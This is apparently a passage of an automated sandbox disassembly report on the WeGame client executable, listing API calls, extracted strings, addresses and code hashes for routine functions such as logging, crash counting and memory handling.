                                                                • API ID: ?get_log_instance@base@@FileH_prolog3_Logger@1@$H_prolog3ModuleNamePathPrivateProfileRemoveSimpleSpecStringString::operator=Write_invalid_parameter_noinfo_noreturnmemset
                                                                • String ID: [main]clear_cmd_launcher_info, failed to clean launcher info$[main]clear_cmd_launcher_info, success to clean launcher info$cmd_launcher_info$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$launcher

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004688F8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000080), ref: 004688FD
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00468986
                                                                • ?scale_path2absolute_path@common@ierd_tgp@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV34@@Z.COMMON(?,?,?,?,?,crash_log.rs,00000080), ref: 0046899A
                                                                • WritePrivateProfileStringW.KERNEL32(WeGame,CrashCount,0047F27C,?), ref: 004689C8
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                • [tgp_daemon_main]before_exit, xrefs: 00468939
                                                                • CrashCount, xrefs: 004689BE
                                                                • crash_log.rs, xrefs: 00468973
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 00468923
                                                                • WeGame, xrefs: 004689C3
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@?scale_path2absolute_path@common@ierd_tgp@@H_prolog3H_prolog3_H_prolog3_catch_Logger@1@PrivateProfileSimpleStringString::operator=U?$char_traits@_V34@@V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@Write
                                                                • String ID: CrashCount$WeGame$[tgp_daemon_main]before_exit$crash_log.rs$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0046288B
                                                                • ?IsStartFromUrlProtocol@Sys_wrapper@common@ierd_tgp@@SA_NXZ.COMMON(00000058), ref: 00462890
                                                                • GetCommandLineW.KERNEL32(00000058), ref: 0046289D
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,00000000), ref: 004628D0
                                                                • ?get_coexist_name@util_multi_instance@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PBD@Z.COMMON ref: 004628F9
                                                                • FindWindowA.USER32(Static,?), ref: 00462916
                                                                • IsWindow.USER32(00000000), ref: 0046291F
                                                                • SendMessageA.USER32(00000000,0000004A,00000000,?), ref: 00462931
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@Window$?get_coexist_name@util_multi_instance@ierd_tgp@@?u16to8@common@ierd_tgp@@CommandD@2@@4@@D@2@@std@@FindFromH_prolog3_LineMessageProtocol@SendStartSys_wrapper@common@ierd_tgp@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@
                                                                • String ID: Static$TGP_EXTERNAL_MESSAGE_RECEIVER

                                                                APIs
                                                                • memmove.VCRUNTIME140(?,06666666,?,?,?,?,85A35C35,?,?), ref: 0043A927
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A94C
                                                                • memset.VCRUNTIME140(85A35C35,00000000,?,00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A962
                                                                • memset.VCRUNTIME140(?,00000000,?,85A35C35,00000000,?,00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A96E
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A97F
                                                                • memmove.VCRUNTIME140(?,00000000,?,00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A9A0
                                                                • memset.VCRUNTIME140(?,00000000,?,?,00000000,?,00000000,?,?,?,?,?,85A35C35,?,?), ref: 0043A9AE
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,85A35C35,?,?), ref: 0043A9FC
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,85A35C35,?,?), ref: 0043AA1D
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,85A35C35,?,?), ref: 0043AA57
                                                                Similarity
                                                                • API ID: memmove$memset$_invalid_parameter_noinfo_noreturn

                                                                APIs
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C3C9
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C3E6
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C3F2
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C405
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C411
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C41B
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C427
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C437
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C443
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046C450
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?pptr@?$basic_streambuf@

                                                                APIs
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450309
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450323
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0045032F
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450342
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0045034E
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450358
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450364
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450374
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 00450380
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0045038D
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?pptr@?$basic_streambuf@

                                                                APIs
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046AA3F
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0046AA58
                                                                Similarity
                                                                • API ID: ?pptr@?$basic_streambuf@D@std@@@std@@U?$char_traits@

                                                                APIs
                                                                  • Part of subcall function 0040E570: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(85A35C35), ref: 0040E60A
                                                                • memset.VCRUNTIME140(?,00000000,00000400,85A35C35,00000027,00000007), ref: 0040E851
                                                                • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,?,?,00000000,00000400,85A35C35,00000027,00000007), ref: 0040E877
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00485D1C,00000000,?,?), ref: 0040E97F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?), ref: 0040EA3D
                                                                • memmove.VCRUNTIME140(00000008,00484A10,00000002,?,?), ref: 0040EAB1
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memmovememsetwcscpy_s
                                                                • String ID: \..\$\.\
                                                                • API String ID: 165942512-457230051
                                                                • Opcode ID: e394b9754b45784545b45f93fac15ce82b392a754ade6de25117a80045140943
                                                                • Instruction ID: 25b704b83fc1f9d6d814e4478af9087140227cf4b919d7611edc7f1cb7de207c
                                                                • Opcode Fuzzy Hash: e394b9754b45784545b45f93fac15ce82b392a754ade6de25117a80045140943
                                                                • Instruction Fuzzy Hash: DBE1B3B1A001188ACB24DF25CC447AEB3B5AF44314F5449EEE60AB7681DB746ED4CF9D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(00000000,00000000,?), ref: 004026D3
                                                                • InitializeCriticalSection.KERNEL32(000000AF,?,?,00000000,00000000,00000000,00000000), ref: 0040275C
                                                                • InitializeCriticalSection.KERNEL32(000000DB,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 004027B8
                                                                • CreateEventW.KERNEL32(?,?,?,00000000,00000001,00000000,00000000), ref: 004027C9
                                                                  • Part of subcall function 0040ED60: memset.VCRUNTIME140(?,00000000,00000400,00000007), ref: 0040ED84
                                                                  • Part of subcall function 0040ED60: _wgetcwd.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,00000200,?,00000000,00000400,00000007), ref: 0040ED95
                                                                  • Part of subcall function 0040E7F0: memset.VCRUNTIME140(?,00000000,00000400,85A35C35,00000027,00000007), ref: 0040E851
                                                                  • Part of subcall function 0040E7F0: wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,?,?,00000000,00000400,85A35C35,00000027,00000007), ref: 0040E877
                                                                  • Part of subcall function 0040E7F0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00485D1C,00000000,?,?), ref: 0040E97F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00000000,00000001,00000000,00000000), ref: 00402873
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$CriticalInitializeSection_invalid_parameter_noinfo_noreturn$CreateEvent_wgetcwdwcscpy_s
                                                                • String ID: C:\$VFSHelper::VFSHelper()
                                                                • API String ID: 2753070241-1341794421
                                                                • Opcode ID: bb13500e9704f3aa0231f7f761f4cf78110c34b6ed7e762edee82db7229d2b98
                                                                • Instruction ID: d5a35042f9391f9f53c54d242e770c1e03323d5a72465c95ff77e375617cc7c7
                                                                • Opcode Fuzzy Hash: bb13500e9704f3aa0231f7f761f4cf78110c34b6ed7e762edee82db7229d2b98
                                                                • Instruction Fuzzy Hash: 38B135B0901746DFE720DF69C90478AFBF0BF44708F208A1EE499AB781D7B96584CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35), ref: 0040A4A3
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A5AC
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A60A
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040A638
                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 0040A653
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040A6A1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection_invalid_parameter_noinfo_noreturn$Leave$Enter
                                                                • String ID: VFSHelper::PreLoad()
                                                                • API String ID: 3200987562-3430744311
                                                                • Opcode ID: 0458d41804cd19b89b84f166fa29019427a03daa07e8c9c6dd46a35bed7b7f8b
                                                                • Instruction ID: 039b1a46b9cfac7b428c27ff86fe46c22b29a4e417e1cbbc7113313b043f08e3
                                                                • Opcode Fuzzy Hash: 0458d41804cd19b89b84f166fa29019427a03daa07e8c9c6dd46a35bed7b7f8b
                                                                • Instruction Fuzzy Hash: 2F71E231D102489BDB04DFA8CD48BDEBBB1FF85318F14422AE405AB3D0D7799A94CB99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(?,00000000,00000000,?,?,?,73E,00455A0C,00000000,00453337,?,00000001,000000DC,00452F44,?), ref: 00468759
                                                                • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(?,00000000,00000000,?,?,?,73E,00455A0C,00000000,00453337,?,00000001,000000DC,00452F44,?), ref: 00468778
                                                                • ?precision@ios_base@std@@QAE_J_J@Z.MSVCP140(004411C6,?,00000000,?,?,?,73E,00455A0C,00000000,00453337,?,00000001,000000DC,00452F44,?), ref: 00468791
                                                                • ?flags@ios_base@std@@QAEHH@Z.MSVCP140(?,00000000,?,?,?,73E,00455A0C,00000000,00453337,?,00000001,000000DC,00452F44,?,?,Function_00052DFA), ref: 004687A9
                                                                • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,Function_00052DFA,0044120E,0044125A,00000014,00453359,?,73E), ref: 004687B6
                                                                • ?exceptions@ios_base@std@@QAEXH@Z.MSVCP140(?,?,Function_00052DFA,0044120E,0044125A,00000014,00453359,?,73E), ref: 004687C1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?exceptions@ios_base@std@@?flags@ios_base@std@@?imbue@?$basic_ios@?precision@ios_base@std@@?width@ios_base@std@@V32@@Vlocale@2@
                                                                • String ID: 73E
                                                                • API String ID: 910353691-750320168
                                                                • Opcode ID: b0ffd9db7423c4d1dd59f60a132d7b67fd469de36cdb62e0d9a260656356a4e7
                                                                • Instruction ID: 1e60cbe320f377dc2335b69e365bbd7affdb80f566fad41aa5e7c8f05c358cfd
                                                                • Opcode Fuzzy Hash: b0ffd9db7423c4d1dd59f60a132d7b67fd469de36cdb62e0d9a260656356a4e7
                                                                • Instruction Fuzzy Hash: AD116035210604AFCB259F15CC48E6ABBB6FF84321B144A1DF897926B0EB34E896DB15
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,0041236F,?,?,?,?,?,?,?,?), ref: 004129F0
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,0041236F,?,?,?,?,?,?,?,?), ref: 00412AD3
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,0041236F,?,?,?,?,?,?,?), ref: 00412AF1
                                                                • memmove.VCRUNTIME140(?,?,?), ref: 00412B7E
                                                                • memmove.VCRUNTIME140(?,?,00000000,?,?,?,?,?,?,?,?,0041236F,?,?,?,?), ref: 00412BA6
                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041236F,?), ref: 00412C23
                                                                • memmove.VCRUNTIME140(?,?,?), ref: 00412C46
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove
                                                                • String ID: o#A
                                                                • API String ID: 2162964266-62411624
                                                                • Opcode ID: b646163f54e8b8b64e7afeb2c85c4e463208a4724331d401d4f59b996b668034
                                                                • Instruction ID: 5fdecc2a9fd540ba1411bf0742c8b4be7afed831291808f840e26320582f2d88
                                                                • Opcode Fuzzy Hash: b646163f54e8b8b64e7afeb2c85c4e463208a4724331d401d4f59b996b668034
                                                                • Instruction Fuzzy Hash: 6BB19271A0024A9FCB11CF6CC6809EEFFB5FF8530472981A9D458DB302D774AA96CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memmove.VCRUNTIME140(?,0FFFFFFF,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD2D
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD52
                                                                • memset.VCRUNTIME140(00000000,00000000,00000001,00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD6A
                                                                • memset.VCRUNTIME140(?,00000000,?,00000000,00000000,00000001,00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD76
                                                                • memmove.VCRUNTIME140(00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD87
                                                                • memmove.VCRUNTIME140(?,00000000,?,00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043AD9F
                                                                • memset.VCRUNTIME140(?,00000000,?,?,00000000,?,00000000,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043ADAD
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,85A35C35,?,?), ref: 0043ADFB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memmove$memset$_invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 3802980928-0
                                                                • Opcode ID: b007e9a87391f8350e0f8a9cb2ddbf9b011bd05113e5b60f9fce822ebb2a1579
                                                                • Instruction ID: a3b8b5973635181f08ce964ab1d264b1006f1c35863027da60226e41b7011c5a
                                                                • Opcode Fuzzy Hash: b007e9a87391f8350e0f8a9cb2ddbf9b011bd05113e5b60f9fce822ebb2a1579
                                                                • Instruction Fuzzy Hash: A0413771D00110AFDB14DB69CC41AAFB7A9EF48314F15822EE856A3690D734ED11C79A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00450192
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000028), ref: 00450199
                                                                • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 004501AF
                                                                • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 004501BB
                                                                • ungetc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 004502D9
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$Gninc@?$basic_streambuf@H_prolog3_ungetc
                                                                • String ID:
                                                                • API String ID: 4215999511-0
                                                                • Opcode ID: 8e3593808baee4218cc0cc96471965f4b05e16ffe91078becbbe921092c2201d
                                                                • Instruction ID: 4d21725aafd167e67809099d7bbf2f79bb47b24e57bc14d46a7afd9dc0a2adbb
                                                                • Opcode Fuzzy Hash: 8e3593808baee4218cc0cc96471965f4b05e16ffe91078becbbe921092c2201d
                                                                • Instruction Fuzzy Hash: B8518F35910519DFCB14CFA5C8948EEBBB4FF08321F54015EE912B3292DB34AD49CBA5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00415235,85A35C35,00001008,00001008,85A35C35,?,00000000,00000000), ref: 00414C68
                                                                • _invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00415235,85A35C35,00001008,00001008,85A35C35,?,00000000,00000000), ref: 00414C74
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _errno_invalid_parameter_noinfo
                                                                • String ID:
                                                                • API String ID: 2959964966-0
                                                                • Opcode ID: 2d4ac5ede91fff41207ce19baef743c0c9a4f5b15570bac1caa400b1661358a5
                                                                • Instruction ID: 1042c00150f72572e5c6aec648c9e27aa6634b72f1127467291e42b9302ea020
                                                                • Opcode Fuzzy Hash: 2d4ac5ede91fff41207ce19baef743c0c9a4f5b15570bac1caa400b1661358a5
                                                                • Instruction Fuzzy Hash: 480165736111146FEB102F9DFD446DAB7ACDFD8779F014037F50CC6211E67A988446A9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00456C7D
                                                                • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,004513A1,00000000), ref: 00456C88
                                                                • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 00456C9F
                                                                • std::locale::_Getfacet.LIBCPMT ref: 00456CA9
                                                                  • Part of subcall function 0044C734: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,00000000,?,004430B7,00000000), ref: 0044C759
                                                                • ?_Getcat@?$ctype@_W@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,004411C6,00000000), ref: 00456CC2
                                                                • std::_Facet_Register.LIBCPMT ref: 00456CDA
                                                                • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 00456CFD
                                                                • _CxxThrowException.VCRUNTIME140(?,004966C4), ref: 00456D1C
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@ExceptionFacet_Getcat@?$ctype@_GetfacetGetgloballocale@locale@std@@H_prolog3Locimp@12@RegisterThrowV42@@Vfacet@locale@2@W@std@@std::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 2791369340-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 00439E60: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(85A35C35,?,?,00000001,000000FF), ref: 00439F86
